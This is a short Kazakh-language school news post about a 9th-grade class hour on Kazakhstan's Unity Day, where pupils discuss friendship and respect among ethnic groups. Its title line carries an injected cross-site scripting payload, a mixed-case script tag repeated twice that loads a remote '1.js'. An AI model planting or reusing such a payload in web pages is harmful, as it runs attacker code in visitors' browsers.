9 сыныпта Сынып сағат<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
21.04.2025
21 сәуір күні 9-сыныпта «Қазақстан халқының бірлігі күні» тақырыбында сынып сағаты өтті.
Сынып жетекшісі Қозбағарова Г.С. басшылығымен оқушылар әртүрлі ұлт өкілдері арасындағы достықтың, өзара түсіністік пен сыйластықтың маңыздылығын талқылады. Қазақстанды мекендеген халықтардың дәстүрлерін еске түсіріп, елдегі бірлік пен бейбітшілікті сақтаудың қаншалықты маңызды екеніне тағы бір көз жеткіздік.
Осындай іс-шаралар оқушыларды басқа халықтардың мәдениеті мен салт-дәстүріне құрметпен қарауға, төзімді, мейірімді болуға және көпұлтты, тату елде өмір сүріп жатқанымызды мақтан тұтуға тәрбиелейді!
Просмотров: 1554